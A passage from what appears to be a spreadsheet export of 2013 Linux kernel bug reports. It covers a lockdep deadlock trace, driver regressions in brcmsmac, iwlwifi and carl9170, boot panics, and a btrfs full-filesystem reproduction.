kernel: [ 5913.077246] [&lt;ffffffff814040b9&gt;] netlink_rcv_skb+0x89/0xb0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077251] [&lt;ffffffff813eb357&gt;] rtnetlink_rcv+0x27/0x40 Apr 20 11:01:28 euler-linux kernel: [ 5913.077254] [&lt;ffffffff81403e20&gt;] netlink_unicast+0x140/0x180 Apr 20 11:01:28 euler-linux kernel: [ 5913.077257] [&lt;ffffffff81404a9e&gt;] netlink_sendmsg+0x33e/0x380 Apr 20 11:01:28 euler-linux kernel: [ 5913.077260] [&lt;ffffffff813c4252&gt;] sock_sendmsg+0x112/0x130 Apr 20 11:01:28 euler-linux kernel: [ 5913.077264] [&lt;ffffffff813c537e&gt;] __sys_sendmsg+0x44e/0x460 Apr 20 11:01:28 euler-linux kernel: [ 5913.077267] [&lt;ffffffff813c5544&gt;] sys_sendmsg+0x44/0x70 Apr 20 11:01:28 euler-linux kernel: [ 5913.077269] [&lt;ffffffff814feab9&gt;] system_call_fastpath+0x16/0x1b Apr 20 11:01:28 euler-linux kernel: [ 5913.077273] Apr 20 11:01:28 euler-linux kernel: [ 5913.077273] -&gt; #0 (&amp;ndev-&gt;lock){+.+...}: Apr 20 11:01:28 euler-linux kernel: [ 5913.077275] [&lt;ffffffff810a798e&gt;] check_prev_add+0x3de/0x440 Apr 20 11:01:28 euler-linux kernel: [ 5913.077278] [&lt;ffffffff810a8027&gt;] validate_chain+0x637/0x730 Apr 20 11:01:28 euler-linux kernel: [ 5913.077281] [&lt;ffffffff810a8417&gt;] __lock_acquire+0x2f7/0x500 Apr 20 11:01:28 euler-linux kernel: [ 5913.077284] [&lt;ffffffff810a8734&gt;] lock_acquire+0x114/0x150 Apr 20 11:01:28 euler-linux kernel: [ 5913.077287] [&lt;ffffffff814f6c82&gt;] rt_read_lock+0x42/0x60 Apr 20 11:01:28 euler-linux kernel: [ 5913.077290] [&lt;ffffffff8147f804&gt;] ipv6_get_lladdr+0x74/0x120 Apr 20 11:01:28 euler-linux kernel: [ 5913.077293] [&lt;ffffffff8149b036&gt;] mld_newpack+0xb6/0x160 Apr 20 11:01:28 euler-linux kernel: [ 5913.077295] [&lt;ffffffff8149b18b&gt;] add_grhead+0xab/0xc0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077298] [&lt;ffffffff8149d03b&gt;] add_grec+0x3ab/0x460 Apr 20 11:01:28 euler-linux kernel: [ 5913.077301] [&lt;ffffffff8149d14a&gt;] mld_send_report+0x5a/0x150 Apr 20 11:01:28 euler-linux kernel: [ 5913.077304] [&lt;ffffffff8149f99e&gt;] igmp6_timer_handler+0x4e/0xb0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077307] [&lt;ffffffff8105705a&gt;] call_timer_fn+0xca/0x1d0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077312] [&lt;ffffffff81057b9f&gt;] run_timer_softirq+0x1df/0x2e0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077315] [&lt;ffffffff8104e8c7&gt;] handle_pending_softirqs+0xf7/0x1f0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077318] [&lt;ffffffff8104ea3b&gt;] __do_softirq_common+0x7b/0xf0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077320] [&lt;ffffffff8104f07f&gt;] __thread_do_softirq+0x1af/0x210 Apr 20 11:01:28 euler-linux kernel: [ 5913.077323] [&lt;ffffffff8104f1c1&gt;] run_ksoftirqd+0xe1/0x1f0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077325] [&lt;ffffffff8106c7de&gt;] kthread+0xae/0xc0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077327] [&lt;ffffffff814fff74&gt;] kernel_thread_helper+0x4/0x10 Apr 20 11:01:28 euler-linux kernel: [ 5913.077332] Apr 20 11:01:28 euler-linux kernel: [ 5913.077332] other info that might help us debug this: Apr 20 11:01:28 euler-linux kernel: [ 5913.077333] Apr 20 11:01:28 euler-linux kernel: [ 5913.077334] Possible unsafe locking scenario: Apr 20 11:01:28 euler-linux kernel: [ 5913.077335] Apr 20 11:01:28 euler-linux kernel: [ 5913.077336] CPU0 CPU1 Apr 20 11:01:28 euler-linux kernel: [ 5913.077337] ---- ---- Apr 20 11:01:28 euler-linux kernel: [ 5913.077338] lock(&amp;mc-&gt;mca_lock); Apr 20 11:01:28 euler-linux kernel: [ 5913.077339] lock(&amp;ndev-&gt;lock); Apr 20 11:01:28 euler-linux kernel: [ 5913.077341] lock(&amp;mc-&gt;mca_lock); Apr 20 11:01:28 euler-linux kernel: [ 5913.077342] lock(&amp;ndev-&gt;lock); Apr 20 11:01:28 euler-linux kernel: [ 5913.077344] Apr 20 11:01:28 euler-linux kernel: [ 5913.077344] *** DEADLOCK *** Apr 20 11:01:28 euler-linux kernel: [ 5913.077345] Apr 20 11:01:28 euler-linux kernel: [ 5913.077346] 4 locks held by ksoftirqd/0/3: Apr 20 11:01:28 euler-linux kernel: [ 5913.077347] #0: (&amp;per_cpu(local_softirq_lock, __cpu).lock){+.+.+.}, at: [&lt;ffffffff8104ef5e&gt;] __thread_do_softirq+0x8e/0x210 Apr 20 11:01:28 euler-linux kernel: [ 5913.077351] #1: (&amp;mc-&gt;mca_timer){+.+...}, at: [&lt;ffffffff81056f90&gt;] call_timer_fn+0x0/0x1d0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077355] #2: (&amp;mc-&gt;mca_lock){+.+...}, at: [&lt;ffffffff8149d130&gt;] mld_send_report+0x40/0x150 Apr 20 11:01:28 euler-linux kernel: [ 5913.077359] #3: (rcu_read_lock){.+.+.+}, at: [&lt;ffffffff8147f790&gt;] ipv6_get_lladdr+0x0/0x120 Apr 20 11:01:28 euler-linux kernel: [ 5913.077363] Apr 20 11:01:28 euler-linux kernel: [ 5913.077363] stack backtrace: Apr 20 11:01:28 euler-linux kernel: [ 5913.077365] Pid: 3, comm: ksoftirqd/0 Not tainted 3.4.24.05-0.1-default #1 Apr 20 11:01:28 euler-linux kernel: [ 5913.077367] Call Trace: Apr 20 11:01:28 euler-linux kernel: [ 5913.077371] [&lt;ffffffff810a5abf&gt;] print_circular_bug+0x10f/0x120 Apr 20 11:01:28 euler-linux kernel: [ 5913.077375] [&lt;ffffffff810a798e&gt;] check_prev_add+0x3de/0x440 Apr 20 11:01:28 euler-linux kernel: [ 5913.077378] [&lt;ffffffff810a8027&gt;] validate_chain+0x637/0x730 Apr 20 11:01:28 euler-linux kernel: [ 5913.077381] [&lt;ffffffff810a8417&gt;] __lock_acquire+0x2f7/0x500 Apr 20 11:01:28 euler-linux kernel: [ 5913.077385] [&lt;ffffffff810a8734&gt;] lock_acquire+0x114/0x150 Apr 20 11:01:28 euler-linux kernel: [ 5913.077387] [&lt;ffffffff8147f804&gt;] ? ipv6_get_lladdr+0x74/0x120 Apr 20 11:01:28 euler-linux kernel: [ 5913.077391] [&lt;ffffffff8107a5a1&gt;] ? get_parent_ip+0x11/0x50 Apr 20 11:01:28 euler-linux kernel: [ 5913.077394] [&lt;ffffffff814f6c82&gt;] rt_read_lock+0x42/0x60 Apr 20 11:01:28 euler-linux kernel: [ 5913.077396] [&lt;ffffffff8147f804&gt;] ? ipv6_get_lladdr+0x74/0x120 Apr 20 11:01:28 euler-linux kernel: [ 5913.077399] [&lt;ffffffff8147f804&gt;] ipv6_get_lladdr+0x74/0x120 Apr 20 11:01:28 euler-linux kernel: [ 5913.077401] [&lt;ffffffff8147f790&gt;] ? if6_seq_start+0x100/0x100 Apr 20 11:01:28 euler-linux kernel: [ 5913.077404] [&lt;ffffffff8149b036&gt;] mld_newpack+0xb6/0x160 Apr 20 11:01:28 euler-linux kernel: [ 5913.077407] [&lt;ffffffff810a8417&gt;] ? __lock_acquire+0x2f7/0x500 Apr 20 11:01:28 euler-linux kernel: [ 5913.077410] [&lt;ffffffff8149b18b&gt;] add_grhead+0xab/0xc0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077413] [&lt;ffffffff8149d03b&gt;] add_grec+0x3ab/0x460 Apr 20 11:01:28 euler-linux kernel: [ 5913.077416] [&lt;ffffffff8149f950&gt;] ? ipv6_mc_destroy_dev+0xd0/0xd0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077419] [&lt;ffffffff8149d14a&gt;] mld_send_report+0x5a/0x150 Apr 20 11:01:28 euler-linux kernel: [ 5913.077422] [&lt;ffffffff8149f99e&gt;] igmp6_timer_handler+0x4e/0xb0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077425] [&lt;ffffffff8105705a&gt;] call_timer_fn+0xca/0x1d0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077427] [&lt;ffffffff81056f90&gt;] ? del_timer+0x130/0x130 Apr 20 11:01:28 euler-linux kernel: [ 5913.077431] [&lt;ffffffff8149f950&gt;] ? ipv6_mc_destroy_dev+0xd0/0xd0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077434] [&lt;ffffffff81057b9f&gt;] run_timer_softirq+0x1df/0x2e0 Apr 20 11:01:28 euler-linux kernel: [ 5913.077437] [&lt;ffffffff8104e8c7&gt;] handle_pending_softirqs+0xf7/0x1f0 Apr 20 11:01:29 euler-linux kernel: [ 5913.077439] [&lt;ffffffff8104ea3b&gt;] __do_softirq_common+0x7b/0xf0 Apr 20 11:01:29 euler-linux kernel: [ 5913.077442] [&lt;ffffffff8104f07f&gt;] __thread_do_softirq+0x1af/0x210 Apr 20 11:01:29 euler-linux kernel: [ 5913.077444] [&lt;ffffffff8104f1c1&gt;] run_ksoftirqd+0xe1/0x1f0 Apr 20 11:01:29 euler-linux kernel: [ 5913.077446] [&lt;ffffffff8104f0e0&gt;] ? __thread_do_softirq+0x210/0x210 Apr 20 11:01:29 euler-linux kernel: [ 5913.077449] [&lt;ffffffff8104f0e0&gt;] ? __thread_do_softirq+0x210/0x210 Apr 20 11:01:29 euler-linux kernel: [ 5913.077451] [&lt;ffffffff8106c7de&gt;] kthread+0xae/0xc0 Apr 20 11:01:29 euler-linux kernel: [ 5913.077455] [&lt;ffffffff814fff74&gt;] kernel_thread_helper+0x4/0x10 Apr 20 11:01:29 euler-linux kernel: [ 5913.077459] [&lt;ffffffff8107ad86&gt;] ? finish_task_switch+0x86/0x120 Apr 20 11:01:29 euler-linux kernel: [ 5913.077462] [&lt;ffffffff814f7774&gt;] ? retint_restore_args+0x13/0x13 Apr 20 11:01:29 euler-linux kernel: [ 5913.077465] [&lt;ffffffff8106c730&gt;] ? kthreadd+0x310/0x310 Apr 20 11:01:29 euler-linux kernel: [ 5913.077468] [&lt;ffffffff814fff70&gt;] ? gs_change+0x13/0x13</t>
  </si>
  <si>
    <t>MIPS: CONFIG_KERNEL_LZO -&gt; undefined reference to `memcpy'</t>
  </si>
  <si>
    <t>2013-05-08 21:20 UTC</t>
  </si>
  <si>
    <t>gromvrs</t>
  </si>
  <si>
    <t>2015-07-09 22:55 UTC</t>
  </si>
  <si>
    <t>Error : arch/mips/boot/compressed/decompress.o: In function `decompress_kernel': decompress.c:(.text+0x6b4): undefined reference to `memcpy' decompress.c:(.text+0x6b4): relocation truncated to fit: R_MIPS_26 against `memcpy' make[1]: *** [vmlinuz] Erreur 1 make: *** [vmlinuz] Erreur 2 The function 'memcpy' is only defined for CONFIG_KERNEL_GZIP arch/mips/boot/compressed/decompress.c: #ifdef CONFIG_KERNEL_GZIP void *memcpy(void *dest, const void *src, size_t n) { int i; const char *s = src; char *d = dest; for (i = 0; i &lt; n; i++) d[i] = s[i]; return dest; } #include "../../../../lib/decompress_inflate.c" #endif #ifdef CONFIG_KERNEL_LZO #include "../../../../lib/decompress_unlzo.c" #endif</t>
  </si>
  <si>
    <t>brcmsmac: dmesg full of errors</t>
  </si>
  <si>
    <t>2013-05-09 20:38 UTC</t>
  </si>
  <si>
    <t>Alexander Mezin</t>
  </si>
  <si>
    <t>2013-11-13 20:40 UTC</t>
  </si>
  <si>
    <t>After upgrade from 3.8 to 3.9 dmesg is full of these errors: [12374.898305] brcmsmac bcma0:0: phyerr 0x1, rate 0x14 [12374.898311] brcmsmac bcma0:0: brcms_c_ampdu_dotxstatus_complete: ampdu tx phy error (0x1) [12529.275861] brcmsmac bcma0:0: phyerr 0x10, rate 0x14 [12529.275887] brcmsmac bcma0:0: brcms_c_ampdu_dotxstatus_complete: ampdu tx phy error (0x10) And TCP connections are disconnected very frequent. My wi-fi card: 0d:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)</t>
  </si>
  <si>
    <t>Rare oops when loading modules.</t>
  </si>
  <si>
    <t>3.8.12</t>
  </si>
  <si>
    <t>2013-05-11 11:16 UTC</t>
  </si>
  <si>
    <t>2013-11-13 20:37 UTC</t>
  </si>
  <si>
    <t>Created attachment 101171 [details] Output from serial console showing oops. Booted 3.8.12 and it BUG-ged at a kobject_put: BUG: unable to handle kernel paging request at f86dd0d8 IP: [&lt;c1125a8d&gt;] kobject_put+0xa/0x50 *pde = 36aff067 *pte = 00000000 Oops: 0000 [#1] PREEMPT SMP Modules linked in: usbhid(+) videobuf2_core acpi_cpufreq(+) snd_rawmidi snd_hwdep snd_seq videodev mperf snd_seq_device snd_pcm snd_page_alloc snd_hrtimer firewire_ohci snd_timer firewire_core ppdev parport_pc snd i2c_i801 dcdbas parport soundcore crc_itu_t microcode psmouse floppy lpc_ich mfd_core pcspkr ehci_pci processor serio_raw nfsd auth_rpcgss binfmt_misc nfs_acl lockd sunrpc uinput ext3 mbcache jbd sr_mod cdrom sd_mod pata_acpi sata_sil radeon uhci_hcd ata_piix cfbfillrect libata ehci_hcd cfbimgblt cfbcopyarea i2c_algo_bit backlight scsi_mod drm_kms_helper usbcore intel_agp e1000 ttm usb_common drm intel_gtt agpgart button Pid: 1726, comm: systemd-udevd Not tainted 3.8.12 #1 Dell Computer Corporation Precision WorkStation 650 /0F1262 EIP: 0060:[&lt;c1125a8d&gt;] EFLAGS: 00010286 CPU: 0 EIP is at kobject_put+0xa/0x50 ... This might have happened once with an earlier kernel, and it hasn't happened again with this kernel. Rare race condition?</t>
  </si>
  <si>
    <t>Switching from X to console is slow</t>
  </si>
  <si>
    <t>3.10-rc1</t>
  </si>
  <si>
    <t>2013-05-12 14:29 UTC</t>
  </si>
  <si>
    <t>2013-11-13 20:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 101231 [details] .config To switch from X to a console with Ctrl-Alt-funktion_key needs now up to 6 seconds. Kernel version 3.9 was still ok. I could not bisect this completely because of compile errors. But the bug seems to be between good: v3.9-10128-g24d0c25 and bad: v3.9-10197-g9e68794 I have a Thinkpad T510, using the built-in Intel graphic card. I attach my .config</t>
  </si>
  <si>
    <t>carl9170 slow in 3.9.2 vs 3.8.11, "WARNING: carl9170_op_tx"</t>
  </si>
  <si>
    <t>3.9.2-1-ARCH</t>
  </si>
  <si>
    <t>2013-05-13 09:40 UTC</t>
  </si>
  <si>
    <t>2013-11-13 20:33 UTC</t>
  </si>
  <si>
    <t>Created attachment 101271 [details] DMESG log I'm using a TP-LINK TL-WN821N v2 on an AMD Phenom II system running Arch Linux. Wireless worked very well on the latest Arch 3.8.11 kernel, but after upgrading to 3.9.2 it's markedly slower. Checking DMESG shows very frequent driver warnings. Example of one is attached.</t>
  </si>
  <si>
    <t>Backlight control regression on System 76 laptop with Nvidia GPU</t>
  </si>
  <si>
    <t>2013-05-14 01:20 UTC</t>
  </si>
  <si>
    <t>2013-06-15 00:11 UTC</t>
  </si>
  <si>
    <t>Created attachment 101341 [details] lspci -vvv output The backlight controls worked fine with kernel version 3.8.12, and don't work with 3.9.2. /sys/class/backlight is now empty. I had this problem with 3.4.x too, and the "still use ACPI backlight control if _DOS doesn't exist" patch in bug 43168 fixed it for me then. In syslog, this line is there when I boot with 3.8.12, but not 3.9.2: nouveau [ DRM] ACPI backlight interface available, not registering our own</t>
  </si>
  <si>
    <t>Toshiba P870-303：regression: panic on boot</t>
  </si>
  <si>
    <t>2013-05-15 11:20 UTC</t>
  </si>
  <si>
    <t>jerome cantenot</t>
  </si>
  <si>
    <t>2013-06-18 12:49 UTC</t>
  </si>
  <si>
    <t>Created attachment 101621 [details] journalctl log when i boot with acpi=off Kernel panic on boot with the kernel 3.9.0, 3.9.1 or 3.9.2. There is no problem with the kernel 3.8.13. I can boot if I add the parameter acpi=off but in this case i have the following problem -&gt; modprobe: ERROR: could not insert 'i915': No such device I have a Toshiba laptop P870-303 with hybride graphics cards. I do not know which component must be selected, so I choose "config-other". [0.302946] [&lt;ffffffff812dc8c8&gt;] ? acpi_add_single_object+0x36e/0x36e [0.303010] [&lt;ffffffff812f595e&gt;] acpi_walk_namespace+0x95/0xc5 [0.303074] [&lt;ffffffff812dc9e4&gt;] acpi_bus_scan+0x4d/0x9d [0.303140] [&lt;ffffffff819068f3&gt;] acpi_scan_init+0x61/0x15f [0.303203] [&lt;ffffffff81270d38&gt;] ? ida_get_new_above+0x218/0x290 [0.303267] [&lt;ffffffff81906707&gt;] acpi_init+0x25d/0x2a6 [0.303330] [&lt;ffffffff819064aa&gt;] ? acpi_sleep_proc_init+0x2a/0x2a [0.303396] [&lt;ffffffff8100210a&gt;] do_one_initcall+0x100/0x160 [0.303461] [&lt;ffffffff818d5037&gt;] kernel_init_freeable+0x15b/0x1dc [0.303526] [&lt;ffffffff818d4881&gt;] ? do_early_param+0x88/0x88 [0.303591] [&lt;ffffffff814b3bb0&gt;] ? rest_init+0x90/0x90 [0.303653] [&lt;ffffffff814b3bbe&gt;] kernell_init+0xe/0x190 [0.303716] [&lt;ffffffff814d96ac&gt;] ret_from_fork+0x7c/0x60 [0.303779] [&lt;ffffffff814b3bb0&gt;] ? rest_init+0x90/0x90 [0.303840] code: 8d a7 28 fe ff ff 53 48 89 fb 48 c7 c7 10 af 87 81 e8 4d e2 1e 00 48 8b 93 f8 02 00 48 8b 83 00 03 00 00 48 c7 c7 10 af 87 81 &lt;48&gt; 89 42 08 48 89 10 48 b8 00 01 1 00 00 00 ad de 48 89 83 f8 [0.306531] RIP [&lt;ffffffff8801c60b5c88&gt;] acpi_release_power_ressource+0x37/0x7a [0.306636] RSP &lt;ffff8801c60b5c88&gt; [0.306694] CR2: 0000000000000008 [0.306760] ---[ end trace 18770136fafb3923 ]---[ [0.306828] Kernel panic - not syncing: Attempted to kill init! exitcode=0x00000009</t>
  </si>
  <si>
    <t>Cannot remove files from a full filesystem</t>
  </si>
  <si>
    <t>3.9-next</t>
  </si>
  <si>
    <t>2013-05-15 12:54 UTC</t>
  </si>
  <si>
    <t>David Sterba</t>
  </si>
  <si>
    <t>2013-07-09 14:24 UTC</t>
  </si>
  <si>
    <t>Josef Bacik</t>
  </si>
  <si>
    <t>btrfs-next top commit f69417e6bdf734be6b, but this has been reproduced with past -next branches as well. $ mkfs.btrfs -b 10g /dev/sdx $ mount -o noatime,enospc_debug /dev/sdx /mnt $ cd /mnt $ fs_mark -F -k -S 0 -D 20000 -N 400000 -s 2048 -t 8 -d . (wait for enospc) $ sync; sleep 1; sync $ cat /dev/zero &gt; zerofill $ sync; sleep 1; sync $ rm -rf * (lots of messages like rm: cannot remove `1a6/51937d86~~~~~~~~TSSNNFQOPW2TZE0ZN5GJWS75': No space left on device ) -- fs_mark ends with FSUse% Count Size Files/sec App Overhead 89 992000 2048 2278.5 516862 89 1000000 2048 2491.8 470615 89 1008000 2048 2183.6 503440 'fi df' after fs_mark Data: total=1.01GB, used=2.02MB System, DUP: total=8.00MB, used=12.00KB System: total=4.00MB, used=0.00 Metadata, DUP: total=4.48GB, used=4.39GB Metadata: total=8.00MB, used=0.00 zeofill: -rw-r--r-- 1 root root 218038272 May 15 14:30 zerofill 'fi df' after zerofill Data: total=1.01GB, used=210.21MB System, DUP: total=8.00MB, used=12.00KB System: total=4.00MB, used=0.00 Metadata, DUP: total=4.48GB, used=4.39GB Metadata: total=8.00MB, used=0.00</t>
  </si>
  <si>
    <t>iwlwifi:  intel 6200 does not connect to WPA-EAP WIFI.</t>
  </si>
  <si>
    <t>3.8.12-3.9.2</t>
  </si>
  <si>
    <t>2013-05-16 15:09 UTC</t>
  </si>
  <si>
    <t>Hinnerk van Bruinehsen</t>
  </si>
  <si>
    <t>2013-11-13 20:28 UTC</t>
  </si>
  <si>
    <t>With kernels with a version greater than 3.8.12 I can't connect to my university's WIFI (eduroam: https://www.eduroam.org/) anymore. Networkmanager just times out after 90 seconds. My wifi-card is: Network controller: Intel Corporation Centrino Advanced-N 6200 (rev 35) With kernel 3.8.11 or older it works with the same userland. I've tracked down the issue to commit 63b77bf489881747c5118476918cc8c29378ee63 (http://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/drivers/net/wireless/iwlwifi/dvm/sta.c?h=linux-3.9.y&amp;id=c30f37f8f1f8d06c142d67ba74955fd48b5cf5a4) If I revert that patch it's working fine again. Therefore I'd guess that it's a regression on the kernel side.</t>
  </si>
  <si>
    <t>poweroff failure in HP Elitebook 6930p</t>
  </si>
  <si>
    <t>2013-05-17 14:45 UTC</t>
  </si>
  <si>
    <t>Iru Cai</t>
  </si>
  <si>
    <t>2013-06-08 02:06 UTC</t>
  </si>
  <si>
    <t>I'm using an HP Elitebook 6930p. After I installed the 3.9.2 kernel, the system cannot poweroff, and hangs after all filesystems unmounted. After I unset HP_WMI and rebuilt the kernel, the system can poweroff.</t>
  </si>
  <si>
    <t>brcmsmac no longer has conectivity</t>
  </si>
  <si>
    <t>2013-05-18 14:08 UTC</t>
  </si>
  <si>
    <t>2013-11-13 20:23 UTC</t>
  </si>
  <si>
    <t>Created attachment 101901 [details] Broken dmesg Since commit [6da3b6c48d79da96a36c2632053cf4f53bf48fb2] brcmsmac: remove brcms_bss_cfg-&gt;associated My wireless no longer has any connectivity - it appears connected but pinging google.com doesn't work and websites no longer connect I've attached my before and after dmesg's and I'll see if I can revert that patch If it makes any difference the brcmsmac used to spam my logs with lots of errors - but it did work</t>
  </si>
  <si>
    <t>iwlwifi stalling on "changed bandwidth" events</t>
  </si>
  <si>
    <t>2013-05-20 21:06 UTC</t>
  </si>
  <si>
    <t>Kai Hendry</t>
  </si>
  <si>
    <t>2014-02-19 22:43 UTC</t>
  </si>
  <si>
    <t>Couple of Archlinux users are experiencing this on 3.9.x https://bbs.archlinux.org/viewtopic.php?pid=1275620</t>
  </si>
  <si>
    <t>Regression in iwlwifi driver between 3.9.2 and 3.10rc1. Breaks 2.4ghz wireless, handicaps 5ghz.</t>
  </si>
  <si>
    <t>3.9.2-&gt;3.10rc1</t>
  </si>
  <si>
    <t>2013-05-21 16:17 UTC</t>
  </si>
  <si>
    <t>Eric Griffith</t>
  </si>
  <si>
    <t>2013-11-13 20:21 UTC</t>
  </si>
  <si>
    <t>~Output of lspci and iwconfig is at the bottom below the hash marks as to not clutter up the description.~ Greetings all, currently running 3.10rc1 with an intel-drm patch (hence the non-mainline name in uname), the other day after upgrading to 3.10rc1 from 3.9.2 I noticed that my wireless wasn't working quite right. I've got 2 networks in the house, one 5ghz (40mhz width) and one 2.4ghz (20mhz width) both out of one Linksys EA3500 router. Two issues are at hand, I'm not sure if they are related so I'm mentioning both here and if they are separate, they can be separated out. Running 3.9.2 I can connect to both networks and my speeds range anywhere from 40MBit/s to 130MBit/s on the 2.4ghz, the 5ghz goes from anywhere between 80Mbit/s to 135Mbit/s. I know at one point I saw 300Mbit/s listed via iwconfig, but I don't remember which network that was on. Booting into 3.10rc1 I cannot connect to the 2.4ghz network at all (networkmanager says its hanging at "Configuring Interface...") and the 5ghz network I CAN connect to, but the adapter is stuck at 13Mbit/s, as shown below in iwconfig. It never goes higher than 13MBit/s, and it goes lower to 1Mbit/s but never anything in between, just jumps between the two. Issue 1: Why is it hanging on 3.10rc1 at "Configuring Interface" for 2.4ghz, and why is it throttling to 13Mbit/s. The other issue, again possibly related possibly not, is that if I don't have "11n_disable=2" for iwlwifi, my Tx Exccessive Retries skyrockets at about 5 a second. "man iwconfig" says to me that "Tx Excessive Retries" is a measure of dropped packets. Kernel version does not matter for that one, both of them drop packets at an ungodly high rate if I don't have that parameter set. Issue 2: Why does iwlwifi drop packets on Wireless-N like they're hot potatoes? Output below. ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ [eric@eric-laptop parameters]$ uname -a Linux eric-laptop 3.10.0-1-mainline-dellxps #1 SMP PREEMPT Thu May 16 19:19:53 EDT 2013 x86_64 GNU/Linux [eric@eric-laptop parameters]$ cat /etc/modprobe.d/iwlwifi.conf options iwlwifi 11n_disable=2 [eric@eric-laptop parameters]$ modinfo iwlwifi | grep 11n_disable parm: 11n_disable:disable 11n functionality, bitmap: 1: full, 2: agg TX, 4: agg RX (uint) [eric@eric-laptop parameters]$ iwconfig wlp2s0 IEEE 802.11abgn ESSID:"ONI" Mode:Managed Frequency:5.18 GHz Access Point: 20:AA:4B:6F:C3:FF Bit Rate=13.5 Mb/s Tx-Power=15 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:off Link Quality=38/70 Signal level=-72 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:2 Invalid misc:264 Missed beacon:0 lo no wireless extensions. [eric@eric-laptop parameters]$ sudo lspci -vv 00:00.0 Host bridge: Intel Corporation 2nd Generation Core Processor Family DRAM Controller (rev 09) Subsystem: Dell Device 052e Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=0c &lt;?&gt; 00:02.0 VGA compatible controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09) (prog-if 00 [VGA controller]) Subsystem: Dell Device 052e Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 41 Region 0: Memory at f0000000 (64-bit, non-prefetchable) [size=4M] Region 2: Memory at e0000000 (64-bit, prefetchable) [size=256M] Region 4: I/O ports at 2000 [size=64] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [90] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0f00c Data: 4191 Capabilities: [d0] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [a4] PCI Advanced Features AFCap: TP+ FLR+ AFCtrl: FLR- AFStatus: TP- Kernel driver in use: i915 Kernel modules: i915 00:16.0 Communication controller: Intel Corporation 6 Series/C200 Series Chipset Family MEI Controller #1 (rev 04) Subsystem: Dell Device 052e Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 40 Region 0: Memory at f0605000 (64-bit, non-prefetchable) [size=16] Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [8c] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0f00c Data: 4181 Kernel driver in use: mei_me 00:1a.0 USB controller: Intel Corporation 6 Series/C200 Series Chipset Family USB Enhanced Host Controller #2 (rev 05) (prog-if 20 [EHCI]) Subsystem: Dell Device 052e Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 0: Memory at f060a000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port: BAR=1 offset=00a0 Capabilities: [98] PCI Advanced Features AFCap: TP+ FLR+ AFCtrl: FLR- AFStatus: TP- Kernel driver in use: ehci-pci Kernel modules: ehci_pci 00:1b.0 Audio device: Intel Corporation 6 Series/C200 Series Chipset Family High Definition Audio Controller (rev 05) Subsystem: Dell Device 052e Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 48 Region 0: Memory at f0600000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] MSI: Enable+ 